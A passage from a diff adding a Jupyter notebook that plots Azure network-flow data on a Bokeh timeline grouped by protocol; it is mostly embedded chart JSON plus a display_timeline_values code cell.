5A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"4385\"},\"selection_policy\":{\"id\":\"4386\"}},\"id\":\"4368\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"items\":[{\"id\":\"4283\"},{\"id\":\"4339\"},{\"id\":\"4399\"},{\"id\":\"4463\"},{\"id\":\"4531\"},{\"id\":\"4603\"},{\"id\":\"4679\"}]},\"id\":\"4282\",\"type\":\"Legend\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"4253\"},\"major_label_policy\":{\"id\":\"4265\"},\"ticker\":{\"id\":\"4233\"}},\"id\":\"4232\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"4278\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"4264\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"below\":[{\"id\":\"4232\"}],\"center\":[{\"id\":\"4235\"},{\"id\":\"4239\"},{\"id\":\"4282\"}],\"height\":500,\"left\":[{\"id\":\"4236\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"4259\"},{\"id\":\"4287\"},{\"id\":\"4314\"},{\"id\":\"4343\"},{\"id\":\"4372\"},{\"id\":\"4403\"},{\"id\":\"4434\"},{\"id\":\"4467\"},{\"id\":\"4500\"},{\"id\":\"4535\"},{\"id\":\"4570\"},{\"id\":\"4607\"},{\"id\":\"4644\"},{\"id\":\"4683\"}],\"right\":[{\"id\":\"4718\"}],\"title\":{\"id\":\"4222\"},\"toolbar\":{\"id\":\"4246\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"4224\"},\"x_scale\":{\"id\":\"4228\"},\"y_range\":{\"id\":\"4226\"},\"y_scale\":{\"id\":\"4230\"}},\"id\":\"4221\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"label\":{\"value\":\"http\"},\"renderers\":[{\"id\":\"4314\"},{\"id\":\"4343\"}]},\"id\":\"4339\",\"type\":\"LegendItem\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"4245\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"end\":1550164435500.0,\"start\":1549959313500.0},\"id\":\"4224\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"4496\"}},\"id\":\"4501\",\"type\":\"CDSView\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"4735\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"4255\"}},\"id\":\"4288\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"4265\",\"type\":\"AllLabels\"},{\"attributes\":{\"formatter\":{\"id\":\"4736\"},\"major_label_policy\":{\"id\":\"4757\"},\"ticker\":{\"id\":\"4731\"}},\"id\":\"4730\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"axis\":{\"id\":\"4232\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"4235\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"4726\",\"type\":\"LinearScale\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@FlowStartTime\":\"datetime\"},\"tooltips\":[[\"FlowDirection\",\"@FlowDirection\"],[\"FlowStartTime\",\"@FlowStartTime{%F %T.%3N}\"],[\"TotalAllowedFlows\",\"@TotalAllowedFlows\"],[\"FlowType\",\"@FlowType\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"L7Protocol\",\"@L7Protocol\"]]},\"id\":\"4220\",\"type\":\"HoverTool\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.4\",\"10.0.3.5\"],\"FlowDirection\":[\"I\",\"O\",\"I\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AIAn7CuOdkIAgCfsK452QgAAG5tFjnZCAAAbm0WOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L7Protocol\":[\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#277E8E\"],\"index\":[417,418,419,420],\"y_index\":[3,3,3,3]},\"selected\":{\"id\":\"4449\"},\"selection_policy\":{\"id\":\"4450\"}},\"id\":\"4430\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"4757\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4681\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4269\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"4310\"},\"glyph\":{\"id\":\"4312\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4313\"},\"view\":{\"id\":\"4315\"}},\"id\":\"4314\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4728\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"4310\"}},\"id\":\"4315\",\"type\":\"CDSView\"},{\"attributes\":{\"axis\":{\"id\":\"4730\"},\"ticker\":null},\"id\":\"4733\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"4310\"},\"glyph\":{\"id\":\"4341\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4342\"},\"view\":{\"id\":\"4344\"}},\"id\":\"4343\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4386\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"4242\",\"type\":\"ResetTool\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"4253\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"4789\"},{\"id\":\"4790\"},{\"id\":\"4791\"},{\"id\":\"4792\"},{\"id\":\"4793\"},{\"id\":\"4794\"},{\"id\":\"4795\"},{\"id\":\"4796\"},{\"id\":\"4797\"},{\"id\":\"4798\"},{\"id\":\"4799\"},{\"id\":\"4800\"}]},\"id\":\"4731\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4370\",\"type\":\"VBar\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"4276\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4368\"},\"glyph\":{\"id\":\"4401\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4402\"},\"view\":{\"id\":\"4404\"}},\"id\":\"4403\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_multi\":{\"id\":\"4744\"},\"tools\":[{\"id\":\"4744\"}]},\"id\":\"4734\",\"type\":\"Toolbar\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"13.107.4.50\",\"8.249.241.254\",\"23.48.36.78\",\"23.223.3.100\",\"205.185.216.42\",\"8.253.45.249\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"40.87.63.92\",\"40.80.145.38\",\"99.84.106.178\",\"23.3.13.106\",\"99.84.106.27\",\"23.45.180.234\",\"99.84.106.92\",\"72.21.81.240\",\"23.3.13.146\",\"23.3.13.112\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.91.29\",\"72.21.91.29\",\"23.4.187.27\",\"205.185.216.42\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"23.48.36.47\",\"13.107.4.50\",\"23.45.180.121\",\"72.21.91.29\",\"173.194.61.40\",\"216.58.218.238\",\"72.21.81.240\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"23.4.187.27\",\"72.21.81.240\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AACUXB+OdkIAgFxXMY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIDBQzWOdkIAgMFDNY52QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgHG1QI52QgCAa9lPjnZCAADeZVOOdkIAgH2mV452QgCA6/5ojnZCAICqWW2OdkIAgKpZbY52QgAATDp6jnZCAIComn6OdkIAAKknhY52QgAAqSeFjnZCAAAInoeOdkIAAAieh452QgAAnBqLjnZCAIAOoY+OdkIAgA6hj452QgAAfiSfjnZCAAB+JJ+OdkIAAIzao452QgAAjNqjjnZCAACQ/LmOdkIAAJD8uY52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"color\":[\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\"],\"index\":[372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"4325\"},\"selection_policy\":{\"id\":\"4326\"}},\"id\":\"4310\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"4325\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"4430\"},\"glyph\":{\"id\":\"4432\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4433\"},\"view\":{\"id\":\"4435\"}},\"id\":\"4434\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"4789\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"4226\",\"type\":\"DataRange1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4342\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4268\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"4222\",\"type\":\"Title\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"4240\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4433\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"4228\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"4273\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"4800\",\"type\":\"YearsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"4244\",\"type\":\"PanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4741\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"4640\"}},\"id\":\"4684\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"4518\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"4271\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"4279\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"4791\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"end\":1550172982249.9998,\"start\":1549950766750.0002},\"id\":\"4722\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"4255\"}},\"id\":\"4260\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4402\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4281\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4286\",\"type\":\"Circle\"}],\"root_ids\":[\"4749\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"24b2cd20-c99f-436b-8e32-edd737404607\",\"root_ids\":[\"4749\"],\"roots\":{\"4749\":\"97c9f024-7c07-4b81-9ded-d8f1e6629bef\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "4749"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "flow_plot = display_timeline_values(\n",
+    "    data=az_net_flows_df,\n",
+    "    group_by=\"L7Protocol\",\n",
+    "    source_columns=[\n",
+    "        \"FlowType\",\n",
+    "        \"AllExtIPs\",\n",
+    "        \"L7Protocol\",\n",
+    "        \"FlowDirection\",\n",
+    "        \"TotalAllowedFlows\",\n",
+    "    ],\n",
+    "    time_column=\"FlowStartTime\",\n",
+    "    y=\"TotalAllowedFlows\",\n",
+    "    legend=\"right\",\n",
+    "    height=500,\n",
+    "    kind=[\"vbar\", \"circle\"],\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:30.105258Z",
+     "start_time": "2020-01-30T20:46:29.965337Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"5056\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
